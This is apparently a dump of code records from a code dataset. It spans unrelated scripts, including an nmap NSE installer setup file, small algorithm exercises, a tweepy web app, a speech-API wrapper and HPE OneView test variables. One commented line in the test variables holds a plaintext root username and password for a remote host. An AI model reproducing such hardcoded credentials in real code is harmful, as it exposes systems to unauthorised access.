3.7\",\r\n \"Topic :: System :: Installation/Setup\",\r\n 'Topic :: Security',\r\n ],\r\n packages=[\"nse_install\"],\r\n #package_dir={'nse_install':'nse_install'}, \r\n #package_data={\r\n # 'nse_install': ['script.toml'],\r\n #},\r\n data_files=[\r\n ('/etc/nse_install/', ['script.toml']),\r\n ],\r\n keywords='security, nse, nmap, pentest, scan, enumeration',\r\n tests_require=test_deps,\r\n extras_require=extras,\r\n install_requires=required,\r\n entry_points={\r\n \"console_scripts\": [\r\n \"nse_install=nse_install.__main__:main\",\r\n ]\r\n },\r\n)\r\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"422923483","text":"#!/usr/bin/env python3\n# 第 0006 题:你有一个目录,放了你一个月的日记,都是 txt,\n# 为了避免分词的问题,假设内容都是英文,请统计出你认为每篇日记最重要的词。\n\nimport os\nimport re\n\ndef legalname(filename):\n fn = filename.split('.')\n return fn[0]!='' and fn[-1].lower()=='txt'\n\n\ndef maxWord(filepath):\n val = 0\n dic = dict()\n text = open(filepath, 'rU').read()\n words = re.findall(r'[a-zA-Z0-9-’\\']+', text)\n for word in words:\n word = word.lower()\n if dic.get(word, 0) == 0:\n dic[word] = 0\n dic[word] += 1\n val = max(val, dic[word])\n words = []\n for key in dic:\n if dic[key] == val:\n words.append(key)\n return val, words\n\n\nif __name__ == '__main__':\n # 
指明被遍历的文件夹\n rootdir =os.path.abspath(os.curdir)+'/assets/'\n for parent,dirnames,filenames in os.walk(rootdir):\n for filename in filenames:\n if legalname(filename):\n infile = os.path.join(parent,filename)\n m = maxWord(infile)\n print(' ', filename, '\\t%d times appeared: %s'%m)\n # im = Image.open(infile) ### 此处Image.open(dir)为多数对象应用的基础.\n # im.thumbnail(size) ### 此处size 为长度为2的tuple类型,改变图片分辨率\n # im.save(infile) ### im.save(dir),图片处理的最后都用这个,就是保存处理过后的图片\n","sub_path":"code/0006.py","file_name":"0006.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"81293279","text":"import sys\n\nsys.stdin = open(\"in1.txt\", \"rt\")\n\n'''\n1부터 N까지의 모든 자연수로 구성된 길이 N의 수열이 주어집니다.\n이 수열의 왼쪽 맨 끝 숫자 또는 오른쪽 맨 끝 숫자 중 하나를 가져와 나열하여 가장 긴 증가수열\n을 만듭니다. 이때 수열에서 가져온 숫자(왼쪽 맨 끝 또는 오른쪽 맨 끝)는 그 수열에서 제거됩니\n다.\n예를 들어 2 4 5 1 3 이 주어지면 만들 수 있는 가장 긴 증가수열의 길이는 4입니다.\n맨 처음 왼쪽 끝에서 2를 가져오고, 그 다음 오른쪽 끝에서 3을 가져오고, 왼쪽 끝에서 4,\n왼쪽 끝에서 5를 가져와 2 3 4 5 증가수열을 만들 수 있습니다.\n▣ 입력설명\n첫째 줄에 자연수 N(3<=N<=100)이 주어집니다.\n두 번째 줄에 N개로 구성된 수열이 주어집니다.\n▣ 출력설명\n첫째 줄에 최대 증가수열의 길이를 출력합니다.\n두 번째 줄에 가져간 순서대로 왼쪽 끝에서 가져갔으면 ‘L', 오른쪽 끝에서 가져갔으면 ’R'를 써\n간 문자열을 출력합니다.(단 마지막에 남은 값은 왼쪽 끝으로 생각합니다.)\n'''\n\nN = int(input())\narr = list(map(int, input().split()))\nlt = 0\nrt = N - 1\nlastNum = 0\nres = \"\"\n\nwhile lt <= rt:\n temp = []\n if arr[lt] > lastNum:\n temp.append((arr[lt], 'L'))\n if arr[rt] > lastNum:\n temp.append((arr[rt], 'R'))\n\n if not temp:\n break\n else:\n temp.sort()\n res += temp[0][1]\n lastNum = temp[0][0]\n if temp[0][1] == 'L':\n lt += 1\n else:\n rt -= 1\n\nprint(len(res))\nprint(res)\n","sub_path":"섹션 4/9. 증가수열 만들기/AA.py","file_name":"AA.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"358848687","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/dnsmon/resolver.py\n# Compiled at: 2011-03-21 18:00:36\n\"\"\"Wrapper to pyDNS to retrieve all DNS results for a given hostname\"\"\"\nimport DNS\nDNS.ParseResolvConf()\nresolver = DNS.DnsRequest(qtype='A')\n\ndef lookup(hostname):\n global resolver\n res = resolver.req(hostname)\n if len(res.answers) == 0:\n return []\n return [ x['data'] for x in res.answers if x['typename'] == 'A' ]","sub_path":"pycfiles/dnsmon-0.1-py2.6/resolver.py","file_name":"resolver.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"432570503","text":"# %%\r\nimport pandas as pd\r\nbcf = pd.read_excel(r'G:\\工作备份\\招联文件\\安鲜达对账\\三方-百富勤食品专营店_201909_对账单-20191018120856.xlsx',\r\n sheet_name='包材辅料费',index_col='订单流水号', usecols=['订单流水号', '包材辅料总费用'])\r\npsf = pd.read_excel(r'G:\\工作备份\\招联文件\\安鲜达对账\\三方-百富勤食品专营店_201909_对账单-20191018120856.xlsx',\r\n sheet_name='配送费', index_col='订单流水号', usecols=['订单流水号', \"配送费用\",'客户订单号'])\r\nddf = pd.read_excel(r'G:\\工作备份\\招联文件\\安鲜达对账\\三方-百富勤食品专营店_201909_对账单-20191018120856.xlsx',\r\n sheet_name='订单操作费', index_col='订单流水号', usecols=['订单流水号', '订单操作费'])\r\nTable = bcf.join(ddf, how='left').join(psf)\r\nColumn_sum = Table.sum(axis=1)\r\nTable.insert(4,'合计',Column_sum)\r\n#order = ['客户订单号', '包材辅料总费用', '订单操作费', '配送费用', '合计']\r\nTable = Table[['客户订单号', '包材辅料总费用', '订单操作费', '配送费用', 
'合计']]\r\ncol=list(Table)\r\nprint(col)\r\n#print(Table.head())\r\nTable.to_excel(r'g:\\sum.xlsx')\r\n\r\n\r\n# %%\r\n","sub_path":"安鲜达快递账单.py","file_name":"安鲜达快递账单.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"225829417","text":"# import util\nimport webapp2\nimport tweepy\nimport secret\nfrom main import BaseHandler\nfrom google.appengine.ext import ndb\nfrom webapp2_extras import routes\n\n# callback_url = 'http://dev.box.dinoia.eu/twitter/'\nauth = tweepy.OAuthHandler(secret.consumer_token,\n secret.consumer_secret)\n\n\nclass Twittero(ndb.Model):\n screen_name = ndb.StringProperty()\n email = ndb.StringProperty()\n access_k = ndb.StringProperty()\n access_s = ndb.StringProperty()\n last_id = ndb.StringProperty()\n data = ndb.DateTimeProperty(auto_now=True)\n\n def followers_ids(self):\n followers = Followers.query(Followers.ui == self.key).fetch()\n return [follower.user_id for follower in followers]\n\n def new_foll(self):\n return Followers.query(Followers.ui == self.key,\n Followers.new == True)\n\n def lost_foll(self):\n return Followers.query(Followers.ui == self.key,\n Followers.lost == True)\n\n\nclass Followers(ndb.Model):\n ui = ndb.KeyProperty(kind=Twittero)\n user_id = ndb.IntegerProperty()\n screen_name = ndb.StringProperty()\n data = ndb.DateTimeProperty(auto_now=True)\n new = ndb.BooleanProperty(default=False)\n lost = ndb.BooleanProperty(default=False)\n\n\nclass TwitterPage(BaseHandler):\n def get(self):\n oauth_verifier = self.request.get(\"oauth_verifier\")\n screen_name = self.request.cookies.get('screen_name')\n if oauth_verifier:\n auth.get_access_token(oauth_verifier)\n api = tweepy.API(auth)\n screen_name = api.me().screen_name\n old_ui = Twittero.query(Twittero.screen_name == screen_name)\n if old_ui.get():\n ui = old_ui.get()\n else:\n ui = Twittero()\n ui.screen_name = screen_name\n ui.access_k = auth.access_token.key\n ui.access_s = auth.access_token.secret\n ui.put()\n self.response.set_cookie('screen_name', screen_name)\n self.redirect('/twitter/')\n elif screen_name is not None:\n ui = Twittero.query(Twittero.screen_name == screen_name).get()\n auth.set_access_token(ui.access_k, ui.access_s)\n api = tweepy.API(auth)\n new_tweets = api.home_timeline()\n ntw_ids = [tw.id_str for tw in new_tweets]\n tw_ids = []\n n = 0\n while ntw_ids[n] != ui.last_id and n < (len(ntw_ids) - 1):\n tw_ids.append(ntw_ids[n])\n n += 1\n tweets = [api.get_status(tw_id) for tw_id in tw_ids]\n ui.last_id = new_tweets[0].id_str\n ui.put()\n # template = util.jinja_environment.get_template('twitter.html')\n # self.response.write(template.render({'tweets': tweets, 'ui': ui}))\n self.generate('twitter.html', {'tweets': tweets, 'ui': ui})\n else:\n redirect_url = auth.get_authorization_url()\n # template = util.jinja_environment.get_template('twitter.html')\n # self.response.write(template.render({'redirect_url': redirect_url}))\n self.generate('twitter.html', {'redirect_url': redirect_url})\n\n\nclass Retweet(webapp2.RequestHandler):\n def get(self):\n screen_name = self.request.cookies.get('screen_name')\n ui = Twittero.query(Twittero.screen_name == screen_name).get()\n auth.set_access_token(ui.access_k, ui.access_s)\n api = tweepy.API(auth)\n id_str = self.request.get('id_str')\n api.retweet(id_str)\n\n\nclass Tweet(webapp2.RequestHandler):\n def get(self):\n screen_name = self.request.cookies.get('screen_name')\n ui = Twittero.query(Twittero.screen_name == screen_name).get()\n 
auth.set_access_token(ui.access_k, ui.access_s)\n api = tweepy.API(auth)\n text = self.request.get('text_tweet')\n api.update_status(text)\n self.redirect(self.request.referer)\n\n\nclass check(webapp2.RequestHandler):\n def get(self):\n screen_name = self.request.cookies.get('screen_name')\n ui = Twittero.query(Twittero.screen_name == screen_name).get()\n ndb.delete_multi([f.key for f in ui.lost_foll()])\n auth.set_access_token(ui.access_k, ui.access_s)\n api = tweepy.API(auth)\n old_list = ui.followers_ids()\n new_list = api.followers_ids()\n put_queue = []\n new_foll = [nf for nf in new_list if nf not in old_list]\n for nf in new_foll:\n f = Followers(ui=ui.key,\n user_id=nf,\n screen_name=api.get_user(nf).screen_name,\n new=True)\n put_queue.append(f)\n for lf in old_list:\n if lf not in new_list:\n exfollower = Followers.query(Followers.user_id == lf).get()\n exfollower.lost = True\n put_queue.append(exfollower)\n for sf in old_list:\n if sf in new_list:\n follower = Followers.query(Followers.user_id == sf).get()\n if follower.new is True:\n follower.new = False\n put_queue.append(follower)\n ndb.put_multi(put_queue)\n self.redirect('/twitter/')\n\napp = webapp2.WSGIApplication([\n routes.RedirectRoute('/twitter/', TwitterPage, name='Twitter', strict_slash=True),\n routes.PathPrefixRoute('/twitter', [\n webapp2.Route('/check', check),\n webapp2.Route('/retweet', Retweet),\n webapp2.Route('/tweet', Tweet),\n ]), ])\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"app/twitter.py","file_name":"twitter.py","file_ext":"py","file_size_in_byte":5684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"548551051","text":"class Solution:\n def findPeakElement(self, nums: List[int]) -> int:\n if len(nums)==1:\n return 0\n x=len(nums)\n for i in range(1,x-1):\n if nums[i]>nums[i-1] and nums[i]>nums[i+1]:\n return i\n if nums[0]>nums[-1]:\n return 0\n else:\n return x-1\n","sub_path":"Sort and Search/寻找峰值.py","file_name":"寻找峰值.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"511280276","text":"shop = {}\n\nwith open('./lenmen.txt', encoding='utf-8') as f:\n for line in f:\n linesplit = line.split('|')[-1].strip(' ').strip('\\n')\n allctry = linesplit.split('/')\n for ctr in allctry:\n ctrr = ctr.strip(' ')\n if ctrr == '':\n ctrr = '日本'\n if ctrr == 'USA' or '59' in ctrr or 'b07' in ctrr:\n ctrr = '美国'\n if 'www' in ctrr:\n ctrr = '英国'\n if 'http' in ctrr or '.' 
in ctrr or '-' in ctrr or 'prog' in ctrr or 'endeavour' in ctrr:\n ctrr = '法国'\n try:\n shop[ctrr] += 1;\n except Exception as ex:\n shop[ctrr] = 0\n shop[ctrr] += 1\n # if not shop[ctr]:\n # shop[ctr] = 0\n # shop[ctr] += 1\n\nprint(shop.keys())\n\ndataarr = []\nfor ctr in shop:\n dataarr.append({\"value\": shop[ctr], \"name\": ctr})\nprint(dataarr)\n\n","sub_path":"learning-group/douban/douban3.py","file_name":"douban3.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"244426613","text":"'''\nCreated on Aug 24, 2012\n\n@author: nyga\n'''\nimport json\nimport urllib.error\nimport urllib.parse\nimport urllib.request\nfrom subprocess import Popen, PIPE\n\n\nclass Voice(object):\n '''\n Implements an interface to the Google Speech Recognition API.\n Provides methods for recording speech from a microphone\n and sending it to the Google API.\n '''\n \n def __init__(self, name):\n self.arecord = None\n self.url = \"https://www.google.com/speech-api/v1/recognize?xjerr=1&client=chromium&lang=en-US\"\n# self.url = \"https://www.google.com/speech-api/v1/recognize?xjerr=1&client=chromium&lang=de-DE\"\n self.header = {'Content-Type' : 'audio/x-flac; rate=16000'}\n self.wavFile = None\n self.wavName = None\n self.name = name\n \n def startRecording(self, duration=None):\n '''\n Initializes a recording process. Reqiures the 'arecord' programm installed.\n If the duration parameter is set, this method will block until the given \n time of recording is up.\n '''\n self.wavName = '/tmp/wavFile_{}.wav'.format(self.name)\n self.wavFile = open(self.wavName, 'w+')\n cmdLine = ['/usr/bin/arecord']\n cmdLine.extend(['-f', 'S16_LE'])\n cmdLine.extend(['-t', 'wav'])\n cmdLine.extend(['-c', '1'])\n cmdLine.extend(['-r', '16000'])\n if duration != None:\n cmdLine.extend(['-d', str(duration)])\n self.arecord = Popen(cmdLine, stdout=self.wavFile, stderr=PIPE)\n if duration:\n self.arecord.wait()\n \n def stopRecording(self):\n '''\n Stops recording.\n '''\n if self.arecord != None:\n self.arecord.terminate()\n self.arecord = None\n if self.wavFile != None:\n self.wavFile.close()\n self.wavFile = None\n \n def analyze(self):\n '''\n Converts the recorded file to the .flac format\n and sends it to Google. 
Result is a JSON string\n        with the hypotheses of written text.\n        '''\n        if self.wavName is None:\n            return \"\"\n        flacName = 'flacFile.flac'\n        cmdLine = ['/usr/bin/ffmpeg']\n        cmdLine.extend(['-i', self.wavName])\n        cmdLine.extend(['-y'])\n        cmdLine.extend([flacName])\n        ffmpeg = Popen(cmdLine, stderr=PIPE)\n        ffmpeg.wait()\n        flacData = open(flacName, 'rb').read()  # binary read: flac payload is bytes\n        header = {'Content-Type' : 'audio/x-flac; rate=16000'}\n        req = urllib.request.Request(self.url, flacData, header)\n        answer = urllib.request.urlopen(req)\n        self.wavName = None\n        jsonResult = json.loads(answer.read())\n        sentence = jsonResult.get('hypothesis', None)\n        if sentence == '':\n            sentence = None\n        return sentence","sub_path":"python3/prac/googlevoice/recognize.py","file_name":"recognize.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"343087541","text":"import pytest\nimport tango\nfrom ska_control_model import HealthState\nfrom tango.test_utils import DeviceTestContext\n\nfrom ska_tmc_sdpmasterleafnode.sdp_master_leaf_node import SdpMasterLeafNode\n\n\n@pytest.fixture\ndef sdpmln_device(request):\n    \"\"\"Create DeviceProxy for tests\"\"\"\n    true_context = request.config.getoption(\"--true-context\")\n    if not true_context:\n        with DeviceTestContext(SdpMasterLeafNode, process=True) as proxy:\n            yield proxy\n    else:\n        database = tango.Database()\n        instance_list = database.get_device_exported_for_class(\n            \"SdpMasterLeafNode\"\n        )\n        for instance in instance_list.value_string:\n            yield tango.DeviceProxy(instance)\n            break\n\n\ndef test_attributes(sdpmln_device):\n    assert sdpmln_device.healthState == HealthState.OK\n","sub_path":"tests/ska_tmc_sdpmasterleafnode/unit/test_sdpmln_healthstate.py","file_name":"test_sdpmln_healthstate.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"378523898","text":"\"\"\"\nUSER DEFINED VARIABLES\n\"\"\"\n\n# INTERCONNECT NAMES FOR TOGGLE_UPLINK,TOGGLE_DOWNLINK\nICM_NAMES = ['ENC47_CN75450498, interconnect 3', 'ENC48_CN7545049J, interconnect 6']\n\n# DOWNLINK_PORT_NAME FOR TOGGLE_DOWNLINK\nDOWNLINK_PORT_NAME = ['d2', 'd2']\n\n# UPLINK_PORT_NAME FOR TOGGLE_UPLINK\nUPLINK_PORT_NAME = ['Q2', 'Q2']\n\n# LE NAME FOR REAPPLY_LE & TO GET LI NAME\nLE = ['LE']\n\n# LI NAME FOR LI-REAPPLY\nLI = ['LE-LIG-2ME']\n\n# UPLINK SET TO BE DELETED IN LI FOR UFG SCENARIO\nDELETE_UPLINKSET_NAME = ['Tunnel']\n\n# SERVER_PROFILE FOR SERVER ONLINE,OFFLINE EDIT\n# First column: Server Profiles. 
Second column: Enclosure, bay #\nSERVER_PROFILE_TO_BAY_MAP = {\n 'E47-Bay1-1': 'None',\n 'E47-Bay2-2': 'None',\n 'E47-Bay3-3': 'ENC47_CN75450498, bay 3',\n 'E47-Bay4-4': 'None',\n 'E47-Bay5-5': 'None',\n 'E47-Bay6-6': 'None',\n 'E47-Bay7-7': 'None',\n 'E47-Bay8-8': 'None',\n 'E47-Bay9-9': 'ENC47_CN75450498, bay 9',\n 'E47-Bay10-10': 'None',\n 'E47-Bay11-11': 'None',\n 'E47-Bay12-12': 'None',\n 'E48-Bay1-13': 'None',\n 'E48-Bay2-14': 'None',\n 'E48-Bay3-15': 'None',\n 'E48-Bay4-16': 'None',\n 'E48-Bay5-17': 'None',\n 'E48-Bay6-18': 'None',\n 'E48-Bay7-19': 'None',\n 'E48-Bay8-20': 'None',\n 'E48-Bay9-21': 'None',\n 'E48-Bay10-22': 'None',\n 'E48-Bay11-23': 'None',\n 'E48-Bay12-24': 'None',\n}\n\n# support-dump-interval\nLE_SUPPORT_DUMP_SLEEP = '50m'\nOV_SUPPORT_DUMP_SLEEP = '15m'\n\n# Appliance-Backup-Restore\nPOST_RESTORE_SLEEP = '50m'\nBACKUP_DOWNLOAD_SLEEP = '5m'\nUPLOAD_BACKUP_WAIT_TIME = '5m'\nUPLOAD_BACKUP_WAIT_INTERVAL = '5s'\n\n# server power on sleep\nSERVER_POWERON_SLEEP = '15m'\n\n# server hardware assign timeout\nSERVER_HW_ASSIGN_WAIT_TIME = '240m'\nSERVER_HW_ASSIGN_INTERVAL = '3s'\n\nUPDATE_FROM_GROUP_WAIT_TIME = '90m'\nUPDATE_FROM_GROUP_WAIT_INTERVAL = '5s'\n\n# Wait for task sleep\nWAIT_FOR_TASK_WAIT_TIME = '30m'\nWAIT_FOR_TASK_INTERVAL = '5s'\n\n# TOGGLE-IC-PORT\nTOGGLE_INTERCONNECT_PORT_SLEEP = '3m'\n\n# Server unaasign reassign sleep post restoration\nSERVER_UNASSIGN_REASSIGN_SLEEP = '25m'\n\n# -----------------\n# Below variables are a copy of robustness data variable file. If we need to use only one data variable file for test cases, its advisable to copy the above variables to configs robustnees data variable file\n# -----------------\n\n\"\"\"\nDEFAULT VARIABLES\n\"\"\"\n\n# REQUEST BODY FOR LE SUPPORT DUMP\n# errorCode - This string is a mandatory one to generate LE support dump and it is a part of support-dump file name,\n# excludeApplianceDump - Boolean value that determines whether the appliance support dump content is excluded from the logical enclosure support dump. This attribute defaults to false if not included\n# encrypt - Boolean value indicating if support dump needs to be encrypted or not\nLE_SUPPORTDUMP_PAYLOAD = {\"encrypt\": False, \"errorCode\": \"MyDump16\", \"excludeApplianceDump\": False}\n\n# REQUEST BODY FOR OV SUPPORT DUMP\n# errorCode - This error code is a mandatory one and it is a part of support-dump file name, such as CI1234 or CI892a2\n# encrypt - Boolean value indicating if support dump needs to be encrypted or not\nSUPPORT_DUMP = {\n \"errorCode\": \"CI\",\n \"encrypt\": False\n}\n\n# ICM scripts directory and get ICM password script\nICM_SCRIPTS_DIR = '/root/ci-fit/4.10_OVEDITS/fusion/tests/wpst_crm/ci_fit/tools/interconnect/scripts'\nICM_PASSWD_SCRIPT = 'get-icm-passwd.sh'\n\n# USE_HAFNIUM_RESOURCE_IPV4 = \n# True: IPv4 address of Master Potash from resource data and use it.\n# False: Get the IPv6 link local address from canmic block\n# through OneView and use it.\n# : This recommended if your TCS has SSH access to Master Potash\n# using IPv6 link local.\nUSE_HAFNIUM_RESOURCE_IPV4 = True\n\n# DISABLE_BONDING_MULTI_TEST: Perform multiple bonding interface checks which varies depending on the bonding mode.\n# NOTE: This is by default set to False. 
Thus, to disable this test set this variable to True (Not recommented)\n# DISABLE_BONDING_MULTI_TEST = False\n# REMOTE_RUN_CHECKS: List of dictionary data of other hosts/ips that you want to trigger server checks (bonding, network, etc).\n# REMOTE_RUN_CHECKS = [\n# { 'host': '15.186.13.8', 'username': 'root', 'password': 'rootpwd', 'command': {'logDir': 'remote_check_server', 'script': 'Check-Server.robot', 'scriptLocation': '/tmp/jasonp/fusion_420/tests/wpst_crm/ci_fit/tests/robustness/tools', 'haFile': '/tmp/jasonp/CISCO_HA_FILE-multi_tcs_compliant.conf', 'dataFile': '/tmp/jasonp/fusion_420/tests/wpst_crm/ci_fit/tests/robustness/resources/synergy_robustness_data_variables_template.py'}},\n# ]\n\n# NO_CHECK_BONDS: List of profiles you don't want to perform check bonds.\n# Default (empty list): []\n# Example workflow: 2 profiles will be excluded from check bonds\n# NO_CHECK_BONDS = [\n# 'CI-FIT-I8-Eagle35-Bay1',\n# 'CI-FIT-I8-Eagle35-Bay2',\n# 'CI-FIT-I8-Eagle35-Bay3',\n# 'CI-FIT-I8-Eagle35-Bay4',\n# 'CI-FIT-I8-Eagle35-Bay5',\n# 'CI-FIT-I8-Eagle35-Bay6',\n# 'CI-FIT-I8-Eagle49-Bay1',\n# 'CI-FIT-I8-Eagle49-Bay2',\n# 'CI-FIT-I8-Eagle49-Bay3',\n# 'CI-FIT-I8-Eagle49-Bay4',\n# 'CI-FIT-I8-Eagle49-Bay5',\n# 'CI-FIT-I8-Eagle49-Bay6',\n# 'CI-FIT-I8-Eagle49-Bay7',\n# 'CI-FIT-I8-Eagle49-Bay8',\n# 'CI-FIT-I8-Eagle49-Bay9',\n# 'CI-FIT-I8-Eagle49-Bay10',\n# 'CI-FIT-I8-Eagle49-Bay11',\n# 'CI-FIT-I8-Eagle49-Bay12'\n# ]\n","sub_path":"robo4.2/fusion/tests/wpst_crm/ci_fit/tests/robustness/resources/ov_edits_data_variables_template.py","file_name":"ov_edits_data_variables_template.py","file_ext":"py","file_size_in_byte":6023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"258158376","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport os\nos.sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..'))\n\nfrom X.Tar import *\n\n\nif __name__ == '__main__':\n\tprint(dir(LS))\n\n\tx = TK(sys.argv[1])\n\tprint(\n\t\tx.__dict__,\n\t\tx.projects()\n\t)\n\n\ttmp = D.temp()\n\tx.t(D([tmp, 't']))\n","sub_path":"Python/_QA/Tar/TK.py","file_name":"TK.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"534038244","text":"#! /usr/bin/python\n\n# Copyright (c) 2019 Filippo Ranza \n\nfrom yaml import safe_load\n\n\nDEFAULT_CONF = {\n \"TIME_LIMIT\": -1,\n \"NUM_THREAD\": -1,\n \"MIP_GAP\": 0.0,\n \"KERNEL\": \"base\",\n \"KERNEL_CONF\": {},\n \"BUCKET\": \"fixed\",\n \"BUCKET_CONF\": {\"size\": 10},\n \"PRELOAD\": True,\n \"LOG\": False,\n \"DEBUG\": '',\n \"KERNEL_SORTER\": \"base_kernel_sort\",\n \"KERNEL_SORTER_CONF\": {},\n \"BUCKET_SORTER\": \"base_bucket_sort\",\n \"BUCKET_SORTER_CONF\": {},\n \"ITERATIONS\": 1,\n}\n\n\ndef check_config(conf):\n for k, v in DEFAULT_CONF.items():\n c = conf[k]\n if not (type(c) is type(v)):\n raise ValueError(\n f\"Configuration Error: {k} should be an {type(v)} found {type(c)} instead\"\n )\n\n\ndef load_config(file_name):\n \"\"\"\n Load the configuration from the given file.\n\n Parameters\n ----------\n file_name : str\n path to the YAML configuration file\n\n Raises\n ------\n ValueError\n if some variable in the given configuration \n does not have the same type of the variables \n in the default configuration. 
Other variables \n are not checked.\n \n Returns\n -------\n config: dict\n map configuration variable name into \n their values\n \"\"\"\n if not file_name:\n return DEFAULT_CONF\n\n with open(file_name) as file:\n conf = safe_load(file)\n\n out = {**DEFAULT_CONF, **conf}\n check_config(out)\n return out\n","sub_path":"ks_engine/config_loader.py","file_name":"config_loader.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"160996713","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/dez/samples/wsgi_test.py\n# Compiled at: 2015-11-19 18:49:54\nfrom dez.http.application import HTTPApplication\n\ndef simple_app(environ, start_response):\n \"\"\"Simplest possible application object\"\"\"\n status = '200 OK'\n response_headers = [('Content-type', 'text/plain')]\n start_response(status, response_headers)\n return ['Hello world!\\n']\n\n\ndef main(**kwargs):\n httpd = HTTPApplication(kwargs['domain'], kwargs['port'])\n httpd.add_wsgi_rule('/', simple_app)\n httpd.start()","sub_path":"pycfiles/dez-0.10.9.32-py2.7/wsgi_test.py","file_name":"wsgi_test.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"194397079","text":"import re\r\n\r\nfrom pymongo import MongoClient\r\nimport db_conf\r\n\r\n\r\ndef conlletion(collectionName):\r\n conn = MongoClient(host=db_conf.db_ip, port=db_conf.db_port)\r\n # 创建数据库\r\n db = conn[db_conf.Db_name]\r\n con = db[collectionName]\r\n return con\r\n\r\n\r\ncomment_coll = conlletion(db_conf.Comment_coll)\r\niniturl_coll = conlletion(db_conf.IndexUrl_coll)\r\n\r\nf = {\"$and\": [\r\n {'subscribers': {'$gte': 0, '$lte': 40000}},\r\n {'_id': 'd68185621820f57757f563095d80429f'}\r\n ]}\r\n# f = {\"$and\":[{\"_id\":\"2cd1a69ae3bf881b2cc03723b8a914ac\"},{'country': 'India1'}]}\r\nfield = {\"_id\", \"author\", \"subscribers\", \"country\", \"email\", \"keyWord\", \"isSend\", \"url\"}\r\ncurrs = comment_coll.find(f, field)\r\nfor i in currs:\r\n print(i)\r\n\r\nt = \"\"\r\nkey = t.split(\",\")\r\nprint(key)","sub_path":"youtube_site/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"599343929","text":"\"\"\"Helper function for high-throughput GNN trainings.\"\"\"\nimport matplotlib.pyplot as plt\n\n# import numpy as np\nimport time\nfrom alignn.train import train_dgl\n\n# from sklearn.metrics import mean_absolute_error\nplt.switch_backend(\"agg\")\n\n\ndef train_prop_model(\n prop=\"\",\n dataset=\"dft_3d\",\n write_predictions=True,\n name=\"alignn\",\n save_dataloader=False,\n train_ratio=None,\n classification_threshold=None,\n val_ratio=None,\n test_ratio=None,\n learning_rate=0.001,\n batch_size=None,\n scheduler=None,\n n_epochs=None,\n id_tag=None,\n num_workers=None,\n):\n \"\"\"Train models for a dataset and a property.\"\"\"\n if scheduler is None:\n scheduler = \"onecycle\"\n if batch_size is None:\n batch_size = 64\n if n_epochs is None:\n n_epochs = 300\n if num_workers is None:\n num_workers = 0\n config = {\n \"dataset\": dataset,\n \"target\": prop,\n \"epochs\": n_epochs, # 00,#00,\n \"batch_size\": batch_size, # 0,\n \"weight_decay\": 1e-05,\n \"learning_rate\": learning_rate,\n \"criterion\": 
\"mse\",\n \"optimizer\": \"adamw\",\n \"scheduler\": scheduler,\n \"save_dataloader\": save_dataloader,\n \"pin_memory\": False,\n \"write_predictions\": write_predictions,\n \"num_workers\": num_workers,\n \"classification_threshold\": classification_threshold,\n \"model\": {\n \"name\": name,\n },\n }\n if id_tag is not None:\n config[\"id_tag\"] = id_tag\n if train_ratio is not None:\n config[\"train_ratio\"] = train_ratio\n if val_ratio is None:\n raise ValueError(\"Enter val_ratio.\")\n\n if test_ratio is None:\n raise ValueError(\"Enter test_ratio.\")\n config[\"val_ratio\"] = val_ratio\n config[\"test_ratio\"] = test_ratio\n if dataset == \"jv_3d\":\n # config[\"save_dataloader\"]=True\n config[\"num_workers\"] = 4\n config[\"pin_memory\"] = False\n # config[\"learning_rate\"] = 0.001\n # config[\"epochs\"] = 300\n\n if dataset == \"mp_3d_2020\":\n config[\"id_tag\"] = \"id\"\n config[\"num_workers\"] = 0\n if dataset == \"megnet2\":\n config[\"id_tag\"] = \"id\"\n config[\"num_workers\"] = 0\n if dataset == \"megnet\":\n config[\"id_tag\"] = \"id\"\n if prop == \"e_form\" or prop == \"gap pbe\":\n config[\"n_train\"] = 60000\n config[\"n_val\"] = 5000\n config[\"n_test\"] = 4239\n # config[\"learning_rate\"] = 0.01\n # config[\"epochs\"] = 300\n config[\"num_workers\"] = 4\n if dataset == 